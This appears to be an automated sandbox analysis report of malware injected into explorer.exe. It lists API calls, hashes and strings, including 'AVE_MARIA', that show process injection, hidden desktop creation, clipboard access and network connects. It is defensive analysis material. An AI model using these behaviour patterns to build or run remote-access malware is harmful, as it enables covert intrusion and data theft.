                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F91AE766047428AEB20DF25F854B2A77A1F789BA0F814239DE5B43B20CF3DD948DB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 432778473-0
                                                                                                                                                                                                                                  • Opcode ID: 440c83a82278f6d8b5a89e2e74b785a7168127761de30ce95c5f4b692ff4a6da
                                                                                                                                                                                                                                  • Instruction ID: ee942e0bbffa50d3f98c0c88ac2e6188cbafb783feb063d4e7020da90e882e8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 440c83a82278f6d8b5a89e2e74b785a7168127761de30ce95c5f4b692ff4a6da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09B15F62725B90CBD71CFE32A8014AE63A6F7D4788B08D935AD5A8BB1CCF74C5158F41
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED5A7
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC474: RtlPcToFileHeader.KERNEL32 ref: 0F3DC503
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC474: RaiseException.KERNEL32 ref: 0F3DC542
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED5C7
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED5E7
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED607
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED63B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED66F
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED6A3
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED6BA
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED6D1
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED6E8
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED6FF
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED716
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED72D
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED744
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED75B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED772
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED789
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED7A9
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED7C9
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED7E9
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED809
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED833
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED857
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED87B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED89B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED8D2
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED8E9
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED91D
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED951
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED971
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED991
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED9B1
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3ED9D1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3102897148-0
                                                                                                                                                                                                                                  • Opcode ID: 21f7fae289d1fce79dba3d8c4766c072887fd8dcb9631de80a8f61fc9e2d6b93
                                                                                                                                                                                                                                  • Instruction ID: df00abd9119e13312ec34f9010bcc8113437448e7ebdbb7d2fc5a4aea69586de
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f7fae289d1fce79dba3d8c4766c072887fd8dcb9631de80a8f61fc9e2d6b93
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37B17063714B808AD71DFF73B8014BB23A6A7D97D4B08E539BE994B65ACF38C5118780
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$File$Create$??3@CloseFolderHandlePathProcessReadSize_malloc_dbg
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3556359532-0
                                                                                                                                                                                                                                  • Opcode ID: 2eab3bbb786823848a9fdf89a6c5b19ada60262e224be649d05a0aa3bbf1e75b
                                                                                                                                                                                                                                  • Instruction ID: 4ff0b1055087bfbdd684a8c73f7708d979d0533671cdb5a62ca6556249d02b0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2eab3bbb786823848a9fdf89a6c5b19ada60262e224be649d05a0aa3bbf1e75b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44817C32610A8695EB20DF25E8907ED77A5F7847A8F405136DA4E07E68EF78C38DD740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$File$CreateMemoryWrite$AllocCloseContextHandleInformationQueryReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 2661801814-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 09236246219cb3b0eb613df847429b7da1a637ec83ead6095aa667148c1cac4b
                                                                                                                                                                                                                                  • Instruction ID: fec650ef3bedc51e330ae683e9cb05045091fd5432e97fdf7453d320cd0f416a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09236246219cb3b0eb613df847429b7da1a637ec83ead6095aa667148c1cac4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12711976204F8186E724CF66F840B9EB7B4F788BA9F444115EE8A53B58DF78C146CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2173410017-0
                                                                                                                                                                                                                                  • Opcode ID: bccdc19c39cb459ebece20eb3efb1986d6c0c38ff43a778ad4d550a5af5f3701
                                                                                                                                                                                                                                  • Instruction ID: e68a163eb01a24710e24b613025091ee9b8ac49b3d417d1b65dd1788191b2b22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bccdc19c39cb459ebece20eb3efb1986d6c0c38ff43a778ad4d550a5af5f3701
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74517A61604A8695EB30DF25EC843ED3361F784BA8F848135C64E47AA9EF78C78ED340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 0F3D9B22
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9B36
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3D9B62
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9B76
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3D9BB7
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9BD3
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6399
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C63AD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: CreateDirectoryA.KERNEL32 ref: 0F3C63B8
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: GetLastError.KERNEL32 ref: 0F3C63C2
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: FindFirstFileA.KERNEL32 ref: 0F3C63E1
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6410
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6421
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6432
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6457
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6469
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C647B
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcmp.KERNEL32 ref: 0F3C6498
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: lstrcmp.KERNEL32 ref: 0F3C64B0
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: CreateDirectoryA.KERNEL32 ref: 0F3C64C1
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: GetLastError.KERNEL32 ref: 0F3C64CB
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6350: FindNextFileA.KERNEL32 ref: 0F3C6504
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3D9C09
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9C1A
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9C2B
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9C3C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3D9C4D
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 0F3D9CBB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$CreateDirectory$ErrorFileFindLastlstrcmp$FirstFolderInformationNextPathProcessVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3227933336-0
                                                                                                                                                                                                                                  • Opcode ID: 170e1715ff527eb968a9782cdb51c7666322d698c7ae97a6f9600ef82824d8be
                                                                                                                                                                                                                                  • Instruction ID: a779eca59b37407c6ec95e91c80086e20950ff493e18ab2aefc7ff8ed892c1d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 170e1715ff527eb968a9782cdb51c7666322d698c7ae97a6f9600ef82824d8be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2515772614A86AAEB30DF24E8943ED77A1F798318F805126D64D4AE68EF78C34DC740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0F3D9897
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0F3D98B6
                                                                                                                                                                                                                                  • OpenDesktopA.USER32 ref: 0F3D98F3
                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 0F3D9921
                                                                                                                                                                                                                                  • SetThreadDesktop.USER32 ref: 0F3D9931
                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0F3D9950
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32 ref: 0F3D9963
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3D9970
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3D997D
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3D998A
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0F3D9997
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0F3D99A4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@Desktop$CloseCreateHandleThreadmemset$DirectoryInformationObjectOpenSingleVolumeWaitWindowswsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2892755948-0
                                                                                                                                                                                                                                  • Opcode ID: 113eead7a1daa152bab12c325c4ec425d8d11bb88e0457a47c1ebe6241598283
                                                                                                                                                                                                                                  • Instruction ID: 04a86587120ea4263c8c328a5e434520d06a452cb447f19835e4515d7c93a232
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113eead7a1daa152bab12c325c4ec425d8d11bb88e0457a47c1ebe6241598283
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB31D731610A4386F770EB21E89877633A1B788B25F414539DA0A46E74DF7C82A8E740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                                                                                  • Opcode ID: 44c5385e35553fb9f11cd72adc5e80b7f8b1bf3eff6ec1570e384e5543ccc5e2
                                                                                                                                                                                                                                  • Instruction ID: 585534d3f6d9beae1434123a5138e45764d94c2ecb733acd1cf7f5858de5c4b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44c5385e35553fb9f11cd72adc5e80b7f8b1bf3eff6ec1570e384e5543ccc5e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76012C35615B8286EA14AB62F81836E6361FB89FF0F4441399E4607B59CF7CC6458744
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                                                  • Opcode ID: a8745a6b37034a59282b45a54d1c22acf42de816d0719711342862b104b48221
                                                                                                                                                                                                                                  • Instruction ID: b8fcb9fc091d1230728e95a2aa4e633ae7f6df0e01360681cf9adb3a447b3866
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8745a6b37034a59282b45a54d1c22acf42de816d0719711342862b104b48221
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52016D2170578382EF289B32F844339A262AB84FF0F4891398E5A07B5ADF3CD546C340
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                  • Instruction ID: 306cd28af3e614e78e9ad03ba8d7051eba3df8e3091edfdaacfc48e33ee83525
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$_malloc_dbg$??3@$_realloc_dbg$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 588341381-0
                                                                                                                                                                                                                                  • Opcode ID: e76fd8026f968cb935bd01f4b84edd48c2ad81937e9f7efd6a22363fb80ea181
                                                                                                                                                                                                                                  • Instruction ID: ffdc4feed8b2f40aa794bacc100565ddb2bd7e32b8d82c9d9fcf887d80987725
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e76fd8026f968cb935bd01f4b84edd48c2ad81937e9f7efd6a22363fb80ea181
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0D18A72605B428ADB64DF3AE85032D37A6FB85FA9F440529EE0A07B29DF38E545C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@$CriticalSectionmemcpy$Leave_malloc_dbg_strncoll$Enter_realloc_dbglstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3112935213-0
                                                                                                                                                                                                                                  • Opcode ID: fd230d44cd9cea604a4cfd9c66013708358b9af5c148d3f22046a68740b4e5e5
                                                                                                                                                                                                                                  • Instruction ID: 46f4de9f1f652560d20465903de5b0ef9070961e0cfc75a9dd999c1713c0e150
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd230d44cd9cea604a4cfd9c66013708358b9af5c148d3f22046a68740b4e5e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E661A062601B4285EE20EF22F85433A67A5BB89FE1F490135DE4E4BB66DF3CE559D300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recvsend$DesktopThreadWindow$??3@BufferCompressCompressionRectSizeSpaceStartupTerminateWork_malloc_dbg
                                                                                                                                                                                                                                  • String ID: AVE_MARIA
                                                                                                                                                                                                                                  • API String ID: 4073229312-2614216035
                                                                                                                                                                                                                                  • Opcode ID: d7d4635a60ad088d906c650275499f0fd8da18ca6b97f7371aeddd61e6b3adeb
                                                                                                                                                                                                                                  • Instruction ID: 81fa3c0a55dd3491a40565d1a15790184f6f24e9f8188f0509fca95b94a1b8ce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7d4635a60ad088d906c650275499f0fd8da18ca6b97f7371aeddd61e6b3adeb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E414E3371170286EB24AB65FA44BB933A2B784BE9F005525ED0647F35DF38E588A700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$lstrlen$??3@_malloc_dbgmemsetwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 492901009-0
                                                                                                                                                                                                                                  • Opcode ID: 430a08c57a099961239f6588bfe5b8a7a9a28289c504f7236ef4ff042c92407b
                                                                                                                                                                                                                                  • Instruction ID: 9ac79a0080f443a53da1a5c3758d85cb4c1d79546c339a56f541b1d7e42f9ec4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430a08c57a099961239f6588bfe5b8a7a9a28289c504f7236ef4ff042c92407b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20418176704A4286EB24DF2AE8447AEB761FB88FE4F445438CE4A03B65DE3CD54D8B40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID: `copy constructor closure'$onstructor closure'$or'
                                                                                                                                                                                                                                  • API String ID: 2027218043-1115476482
                                                                                                                                                                                                                                  • Opcode ID: c15c03bbeee6e195ae0e7f22bcb66eefc724195b1fc65d95fa29965c6df0ce92
                                                                                                                                                                                                                                  • Instruction ID: 159ec92d68fdfd8ae5417e8242163ab98c29098f3c7094571d78abadd13eb183
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c15c03bbeee6e195ae0e7f22bcb66eefc724195b1fc65d95fa29965c6df0ce92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6517B26311B4492EB20DB66E99075A73A4F788B98F5482259F9C47F14EF3CD16ACF04
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 0F3C6170
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3C61AA
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3C61CD
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C61DD
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 0F3C624C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C61ED
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcpy.KERNEL32 ref: 0F3C4573
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4582
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4594
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45A6
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45B5
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45C7
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45E3
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: wsprintfA.USER32 ref: 0F3C45F9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4609
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C461B
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C462D
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: WSAStartup.WS2_32 ref: 0F3C463F
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: socket.WS2_32 ref: 0F3C465F
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: gethostbyname.WS2_32 ref: 0F3C4679
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: memcpy.MSVCRT ref: 0F3C4699
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: htons.WS2_32 ref: 0F3C46A9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: connect.WS2_32 ref: 0F3C46C0
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrlenA.KERNEL32 ref: 0F3C46D3
